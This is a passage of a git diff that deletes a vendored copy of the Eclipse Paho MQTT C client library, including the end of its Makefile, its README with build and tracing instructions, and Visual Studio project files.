-TEST_FILES_A = test4 test9 test_mqtt4async
-ASYNC_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_A}}
-
-TEST_FILES_AS = test5
-ASYNC_SSL_TESTS = ${addprefix ${blddir}/test/,${TEST_FILES_AS}}
-
-# The names of the four different libraries to be built
-MQTTLIB_C = paho-mqtt3c
-MQTTLIB_CS = paho-mqtt3cs
-MQTTLIB_A = paho-mqtt3a
-MQTTLIB_AS = paho-mqtt3as
-
-CC ?= gcc
-
-ifndef INSTALL
-INSTALL = install
-endif
-INSTALL_PROGRAM = $(INSTALL)
-INSTALL_DATA =  $(INSTALL) -m 644
-DOXYGEN_COMMAND = doxygen
-
-MAJOR_VERSION = 1
-MINOR_VERSION = 0
-VERSION = ${MAJOR_VERSION}.${MINOR_VERSION}
-
-MQTTLIB_C_TARGET = ${blddir}/lib${MQTTLIB_C}.so.${VERSION}
-MQTTLIB_CS_TARGET = ${blddir}/lib${MQTTLIB_CS}.so.${VERSION}
-MQTTLIB_A_TARGET = ${blddir}/lib${MQTTLIB_A}.so.${VERSION}
-MQTTLIB_AS_TARGET = ${blddir}/lib${MQTTLIB_AS}.so.${VERSION}
-MQTTVERSION_TARGET = ${blddir}/MQTTVersion
-
-CCFLAGS_SO = -g -fPIC $(CFLAGS) -Os -Wall -fvisibility=hidden -I$(blddir_work)
-FLAGS_EXE = $(LDFLAGS) -I ${srcdir} -lpthread -L ${blddir}
-FLAGS_EXES = $(LDFLAGS) -I ${srcdir} ${START_GROUP} -lpthread -lssl -lcrypto ${END_GROUP} -L ${blddir}
-
-LDCONFIG ?= /sbin/ldconfig
-LDFLAGS_C = $(LDFLAGS) -shared -Wl,-init,$(MQTTCLIENT_INIT) -lpthread
-LDFLAGS_CS = $(LDFLAGS) -shared $(START_GROUP) -lpthread $(EXTRA_LIB) -lssl -lcrypto $(END_GROUP) -Wl,-init,$(MQTTCLIENT_INIT)
-LDFLAGS_A = $(LDFLAGS) -shared -Wl,-init,$(MQTTASYNC_INIT) -lpthread
-LDFLAGS_AS = $(LDFLAGS) -shared $(START_GROUP) -lpthread $(EXTRA_LIB) -lssl -lcrypto $(END_GROUP) -Wl,-init,$(MQTTASYNC_INIT)
-
-SED_COMMAND = sed \
-    -e "s/@CLIENT_VERSION@/${release.version}/g" \
-    -e "s/@BUILD_TIMESTAMP@/${build.level}/g"
-
-ifeq ($(OSTYPE),Linux)
-
-MQTTCLIENT_INIT = MQTTClient_init
-MQTTASYNC_INIT = MQTTAsync_init
-START_GROUP = -Wl,--start-group
-END_GROUP = -Wl,--end-group
-
-EXTRA_LIB = -ldl
-
-LDFLAGS_C += -Wl,-soname,lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-LDFLAGS_CS += -Wl,-soname,lib$(MQTTLIB_CS).so.${MAJOR_VERSION} -Wl,-no-whole-archive
-LDFLAGS_A += -Wl,-soname,lib${MQTTLIB_A}.so.${MAJOR_VERSION}
-LDFLAGS_AS += -Wl,-soname,lib${MQTTLIB_AS}.so.${MAJOR_VERSION} -Wl,-no-whole-archive
-
-else ifeq ($(OSTYPE),Darwin)
-
-MQTTCLIENT_INIT = _MQTTClient_init
-MQTTASYNC_INIT = _MQTTAsync_init
-START_GROUP =
-END_GROUP =
-
-EXTRA_LIB = -ldl
-
-CCFLAGS_SO += -Wno-deprecated-declarations -DOSX -I /usr/local/opt/openssl/include
-LDFLAGS_C += -Wl,-install_name,lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-LDFLAGS_CS += -Wl,-install_name,lib$(MQTTLIB_CS).so.${MAJOR_VERSION} -L /usr/local/opt/openssl/lib
-LDFLAGS_A += -Wl,-install_name,lib${MQTTLIB_A}.so.${MAJOR_VERSION}
-LDFLAGS_AS += -Wl,-install_name,lib${MQTTLIB_AS}.so.${MAJOR_VERSION} -L /usr/local/opt/openssl/lib
-FLAGS_EXE += -DOSX
-FLAGS_EXES += -L /usr/local/opt/openssl/lib
-
-endif
-
-all: build
-
-build: | mkdir ${MQTTLIB_C_TARGET} ${MQTTLIB_CS_TARGET} ${MQTTLIB_A_TARGET} ${MQTTLIB_AS_TARGET} ${MQTTVERSION_TARGET} ${SYNC_SAMPLES} ${ASYNC_SAMPLES} ${SYNC_TESTS} ${SYNC_SSL_TESTS} ${ASYNC_TESTS} ${ASYNC_SSL_TESTS}
-
-clean:
-	rm -rf ${blddir}/*
-	rm -rf ${blddir_work}/*
-
-mkdir:
-	-mkdir -p ${blddir}/samples
-	-mkdir -p ${blddir}/test
-	echo OSTYPE is $(OSTYPE)
-
-${SYNC_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_C_TARGET)
-	${CC} -DNOSTACKTRACE $(srcdir)/Thread.c -g -o $@ $< -l${MQTTLIB_C} ${FLAGS_EXE}
-
-${SYNC_SSL_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_CS} ${FLAGS_EXES}
-
-${ASYNC_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_A} ${FLAGS_EXE}
-
-${ASYNC_SSL_TESTS}: ${blddir}/test/%: ${srcdir}/../test/%.c $(MQTTLIB_CS_TARGET) $(MQTTLIB_AS_TARGET)
-	${CC} -g -o $@ $< -l${MQTTLIB_AS} ${FLAGS_EXES}
-
-${SYNC_SAMPLES}: ${blddir}/samples/%: ${srcdir}/samples/%.c $(MQTTLIB_C_TARGET)
-	${CC} -o $@ $< -l${MQTTLIB_C} ${FLAGS_EXE}
-
-${ASYNC_SAMPLES}: ${blddir}/samples/%: ${srcdir}/samples/%.c $(MQTTLIB_A_TARGET)
-	${CC} -o $@ $< -l${MQTTLIB_A} ${FLAGS_EXE}
-
-$(blddir_work)/VersionInfo.h: $(srcdir)/VersionInfo.h.in
-	$(SED_COMMAND) $< > $@
-
-${MQTTLIB_C_TARGET}: ${SOURCE_FILES_C} ${HEADERS_C} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_C} ${LDFLAGS_C}
-	-ln -s lib$(MQTTLIB_C).so.${VERSION}  ${blddir}/lib$(MQTTLIB_C).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_C).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_C).so
-
-${MQTTLIB_CS_TARGET}: ${SOURCE_FILES_CS} ${HEADERS_C} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_CS} -DOPENSSL ${LDFLAGS_CS}
-	-ln -s lib$(MQTTLIB_CS).so.${VERSION}  ${blddir}/lib$(MQTTLIB_CS).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_CS).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_CS).so
-
-${MQTTLIB_A_TARGET}: ${SOURCE_FILES_A} ${HEADERS_A} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_A} ${LDFLAGS_A}
-	-ln -s lib$(MQTTLIB_A).so.${VERSION}  ${blddir}/lib$(MQTTLIB_A).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_A).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_A).so
-
-${MQTTLIB_AS_TARGET}: ${SOURCE_FILES_AS} ${HEADERS_A} $(blddir_work)/VersionInfo.h
-	${CC} ${CCFLAGS_SO} -o $@ ${SOURCE_FILES_AS} -DOPENSSL ${LDFLAGS_AS}
-	-ln -s lib$(MQTTLIB_AS).so.${VERSION}  ${blddir}/lib$(MQTTLIB_AS).so.${MAJOR_VERSION}
-	-ln -s lib$(MQTTLIB_AS).so.${MAJOR_VERSION} ${blddir}/lib$(MQTTLIB_AS).so
-
-${MQTTVERSION_TARGET}: $(srcdir)/MQTTVersion.c $(srcdir)/MQTTAsync.h ${MQTTLIB_A_TARGET} $(MQTTLIB_CS_TARGET)
-	${CC} ${FLAGS_EXE} -o $@ -l${MQTTLIB_A} $(srcdir)/MQTTVersion.c -ldl
-
-strip_options:
-	$(eval INSTALL_OPTS := -s)
-
-install-strip: build strip_options install
-
-install: build
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_C_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_CS_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_A_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_DATA) ${INSTALL_OPTS} ${MQTTLIB_AS_TARGET} $(DESTDIR)${libdir}
-	$(INSTALL_PROGRAM) ${INSTALL_OPTS} ${MQTTVERSION_TARGET} $(DESTDIR)${bindir}
-	$(LDCONFIG) $(DESTDIR)${libdir}
-	ln -s lib$(MQTTLIB_C).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so
-	ln -s lib$(MQTTLIB_CS).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so
-	ln -s lib$(MQTTLIB_A).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so
-	ln -s lib$(MQTTLIB_AS).so.${MAJOR_VERSION} $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so
-	$(INSTALL_DATA) ${srcdir}/MQTTAsync.h $(DESTDIR)${includedir}
-	$(INSTALL_DATA) ${srcdir}/MQTTClient.h $(DESTDIR)${includedir}
-	$(INSTALL_DATA) ${srcdir}/MQTTClientPersistence.h $(DESTDIR)${includedir}
-
-uninstall:
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so.${VERSION}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so.${VERSION}
-	rm $(DESTDIR)${bindir}/MQTTVersion
-	$(LDCONFIG) $(DESTDIR)${libdir}
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_C).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_CS).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_A).so
-	rm $(DESTDIR)${libdir}/lib$(MQTTLIB_AS).so
-	rm $(DESTDIR)${includedir}/MQTTAsync.h
-	rm $(DESTDIR)${includedir}/MQTTClient.h
-	rm $(DESTDIR)${includedir}/MQTTClientPersistence.h
-
-REGEX_DOXYGEN := \
-    's;@PROJECT_SOURCE_DIR@/src/\?;;' \
-    's;@PROJECT_SOURCE_DIR@;..;' \
-    's;@CMAKE_CURRENT_BINARY_DIR@;../build/output;'
-SED_DOXYGEN := $(foreach sed_exp,$(REGEX_DOXYGEN),-e $(sed_exp))
-define process_doxygen
-	cd ${srcdir}; sed $(SED_DOXYGEN) ../doc/${1}.in > ../$(docdir_work)/${1}
-	cd ${srcdir}; $(DOXYGEN_COMMAND) ../$(docdir_work)/${1}
-endef
-html:
-	-mkdir -p $(docdir_work)
-	-mkdir -p ${docdir}
-	$(call process_doxygen,DoxyfileV3ClientAPI)
-	$(call process_doxygen,DoxyfileV3AsyncAPI)
-	$(call process_doxygen,DoxyfileV3ClientInternal)
diff --git a/thirdparty/paho.mqtt.c/README.md b/thirdparty/paho.mqtt.c/README.md
deleted file mode 100644
index 66dfec7..0000000
--- a/thirdparty/paho.mqtt.c/README.md
+++ /dev/null
@@ -1,215 +0,0 @@
-# Eclipse Paho MQTT C client
-
-This repository contains the source code for the [Eclipse Paho](http://eclipse.org/paho) MQTT C client library.
-
-This code builds libraries which enable applications to connect to an [MQTT](http://mqtt.org) broker to publish messages, and to subscribe to topics and receive published messages.
-
-Both synchronous and asynchronous modes of operation are supported.
-
-## Build Status
-
-Linux Build Status: [![Linux Build Status](https://travis-ci.org/eclipse/paho.mqtt.c.svg?branch=master)](https://travis-ci.org/eclipse/paho.mqtt.c)
-
-## Libraries
-
-The Paho C client comprises four shared libraries:
-
- * libmqttv3a.so - asynchronous
- * libmqttv3as.so - asynchronous with SSL
- * libmqttv3c.so - "classic" / synchronous
- * libmqttv3cs.so - "classic" / synchronous with SSL
-
-Optionally, using the CMake build, you can build static versions of those libraries.
-
-## Build instructions for GNU Make
-
-Ensure the OpenSSL development package is installed.  Then from the client library base directory run:
-
-```
-make
-sudo make install
-```
-
-This will build and install the libraries.  To uninstall:
-
-```
-sudo make uninstall
-```
-
-To build the documentation requires doxygen and optionally graphviz.
-
-```
-make html
-```
-
-The provided GNU Makefile is intended to perform all build steps in the ```build``` directory within the source-tree of Eclipse Paho. Generated binares, libraries, and the documentation can be found in the ```build/output``` directory after completion. 
-
-Options that are passed to the compiler/linker can be specified by typical Unix build variables:
-
-Variable | Description
------------- | -------------
-CC | Path to the C compiler
-CFLAGS | Flags passed to compiler calls
-LDFLAGS | Flags passed to linker calls
-
-
-## Build requirements / compilation using CMake
-
-There build process currently supports a number of Linux "flavors" including ARM and s390, OS X, AIX and Solaris as well as the Windows operating system. The build process requires the following tools:
-  * CMake (http://cmake.org)
-  * Ninja (https://martine.github.io/ninja/) or
-    GNU Make (https://www.gnu.org/software/make/), and
-  * gcc (https://gcc.gnu.org/).
-
-On Debian based systems this would mean that the following packages have to be installed:
-
-```
-apt-get install build-essential gcc make cmake cmake-gui cmake-curses-gui
-```
-
-Also, in order to build a debian package from the source code, the following packages have to be installed
-
-```
-apt-get install fakeroot fakeroot devscripts dh-make lsb-release
-```
-
-Ninja can be downloaded from its github project page in the "releases" section. Optionally it is possible to build binaries with SSL support. This requires the OpenSSL libraries and includes to be available. E. g. on Debian:
-
-```
-apt-get install libssl-dev
-```
-
-The documentation requires doxygen and optionally graphviz:
-
-```
-apt-get install doxygen graphviz
-```
-
-Before compiling, determine the value of some variables in order to configure features, library locations, and other options:
-
-Variable | Default Value | Description
------------- | ------------- | -------------
-PAHO_BUILD_STATIC | FALSE | Build a static version of the libraries
-PAHO_WITH_SSL | FALSE | Flag that defines whether to build ssl-enabled binaries too. 
-OPENSSL_SEARCH_PATH | "" (system default) | Directory containing your OpenSSL installation (i.e. `/usr/local` when headers are in `/usr/local/include` and libraries are in `/usr/local/lib`)
-PAHO_BUILD_DOCUMENTATION | FALSE | Create and install the HTML based API documentation (requires Doxygen)
-PAHO_BUILD_SAMPLES | FALSE | Build sample programs
-MQTT_TEST_BROKER | tcp://localhost:1883 | MQTT connection URL for a broker to use during test execution
-MQTT_TEST_PROXY | tcp://localhost:1883 | Hostname of the test proxy to use
-MQTT_SSL_HOSTNAME | localhost | Hostname of a test SSL MQTT broker to use
-PAHO_BUILD_DEB_PACKAGE | FALSE | Build debian package
-
-Using these variables CMake can be used to generate your Ninja or Make files. Using CMake, building out-of-source is the default. Therefore it is recommended to invoke all build commands inside your chosen build directory but outside of the source tree.
-
-An example build session targeting the build platform could look like this:
-
-```
-mkdir /tmp/build.paho
-cd /tmp/build.paho
-cmake -GNinja -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DPAHO_BUILD_SAMPLES=TRUE ~/git/org.eclipse.paho.mqtt.c
-```
-
-Invoking cmake and specifying build options can also be performed using cmake-gui or ccmake (see https://cmake.org/runningcmake/). For example:
-
-```
-ccmake -GNinja ~/git/org.eclipse.paho.mqtt.c
-```
-
-To compile/link the binaries and to generate packages, simply invoke `ninja package` or `make -j <number-of-cores-to-use> package` after CMake. To simply compile/link invoke `ninja` or `make -j <number-of-cores-to-use>`.
-
-### Debug builds
-
-Debug builds can be performed by defining the value of the ```CMAKE_BUILD_TYPE``` option to ```Debug```. For example:
-
-```
-cmake -GNinja -DCMAKE_BUILD_TYPE=Debug git/org.eclipse.paho.mqtt.c
-```
-
-
-### Running the tests
-
-Test code is available in the ``test`` directory. The tests can be built and executed with the CMake build system. The test execution requires a MQTT broker running. By default, the build system uses ```localhost```, however it is possible to configure the build to use an external broker. These parameters are documented in the Build Requirements section above.
-
-After ensuring a MQTT broker is available, it is possible to execute the tests by starting the proxy and running `ctest` as described below:
-
-```
-python ../test/mqttsas2.py &
-ctest -VV
-```
-
-### Cross compilation
-
-Cross compilation using CMake is performed by using so called "toolchain files" (see: http://www.vtk.org/Wiki/CMake_Cross_Compiling).
-
-The path to the toolchain file can be specified by using CMake's `-DCMAKE_TOOLCHAIN_FILE` option. In case no toolchain file is specified, the build is performed for the native build platform.
-
-For your convenience toolchain files for the following platforms can be found in the `cmake` directory of Eclipse Paho:
-  * Linux x86
-  * Linux ARM11 (a.k.a. the Raspberry Pi)
-  * Windows x86_64
-  * Windows x86
-
-The provided toolchain files assume that required compilers/linkers are to be found in the environment, i. e. the PATH-Variable of your user or system. If you prefer, you can also specify the absolute location of your compilers in the toolchain files.
-
-Example invocation for the Raspberry Pi:
-
-```
-cmake -GNinja -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_SAMPLES=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DOPENSSL_LIB_SEARCH_PATH=/tmp/libssl-dev/usr/lib/arm-linux-gnueabihf -DOPENSSL_INC_SEARCH_PATH="/tmp/libssl-dev/usr/include/openssl;/tmp/libssl-dev/usr/include/arm-linux-gnueabihf" -DCMAKE_TOOLCHAIN_FILE=~/git/org.eclipse.paho.mqtt.c/cmake/toolchain.linux-arm11.cmake ~/git/org.eclipse.paho.mqtt.c
-```
-
-Compilers for the Raspberry Pi can be obtained from e. g. Linaro (see: http://releases.linaro.org/15.06/components/toolchain/binaries/4.8/arm-linux-gnueabihf/). This example assumes that OpenSSL-libraries and includes have been installed in the ```/tmp/libssl-dev``` directory.
-
-Example invocation for Windows 64 bit:
-
-```
-cmake -GNinja -DPAHO_BUILD_SAMPLES=TRUE -DCMAKE_TOOLCHAIN_FILE=~/git/org.eclipse.paho.mqtt.c/cmake/toolchain.win64.cmake ~/git/org.eclipse.paho.mqtt.c
-
-```
-
-In this case the libraries and executable are not linked against OpenSSL Libraries. Cross compilers for the Windows platform can be installed on Debian like systems like this:
-
-```
-apt-get install gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
-```
-
-## Usage and API
-
-Detailed API documentation is available by building the Doxygen docs in the  ``doc`` directory. A [snapshot is also available online](https://www.eclipse.org/paho/files/mqttdoc/MQTTClient/html/index.html).
-
-Samples are available in the Doxygen docs and also in ``src/samples`` for reference.
-
-Note that using the C headers from a C++ program requires the following declaration as part of the C++ code:
-
-```
-    extern "C" {
-    #include "MQTTClient.h"
-    #include "MQTTClientPersistence.h"
-    }
-```
-
-## Runtime tracing
-
-A number of environment variables control runtime tracing of the C library.
-
-Tracing is switched on using ``MQTT_C_CLIENT_TRACE`` (a value of ON traces to stdout, any other value should specify a file to trace to).
-
-The verbosity of the output is controlled using the  ``MQTT_C_CLIENT_TRACE_LEVEL`` environment variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM (from least to most verbose).
-
-The variable ``MQTT_C_CLIENT_TRACE_MAX_LINES`` limits the number of lines of trace that are output.
-
-```
-export MQTT_C_CLIENT_TRACE=ON
-export MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-```
-
-## Reporting bugs
-
-Please open issues in the Github project: https://github.com/eclipse/paho.mqtt.c/issues.
-
-## More information
-
-Discussion of the Paho clients takes place on the [Eclipse paho-dev mailing list](https://dev.eclipse.org/mailman/listinfo/paho-dev).
-
-General questions about the MQTT protocol are discussed in the [MQTT Google Group](https://groups.google.com/forum/?hl=en-US&fromgroups#!forum/mqtt).
-
-There is much more information available via the [MQTT community site](http://mqtt.org).
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj
deleted file mode 100644
index 3ae0451..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj
+++ /dev/null
@@ -1,166 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{6EFC1F3B-CEE1-4DD2-80B4-CEC37954D468}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>ConsoleApplication1</RootNamespace>
-    <ProjectName>MQTTVersion</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\MQTTVersion.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters
deleted file mode 100644
index 2442da5..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/MQTTVersion/MQTTVersion.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
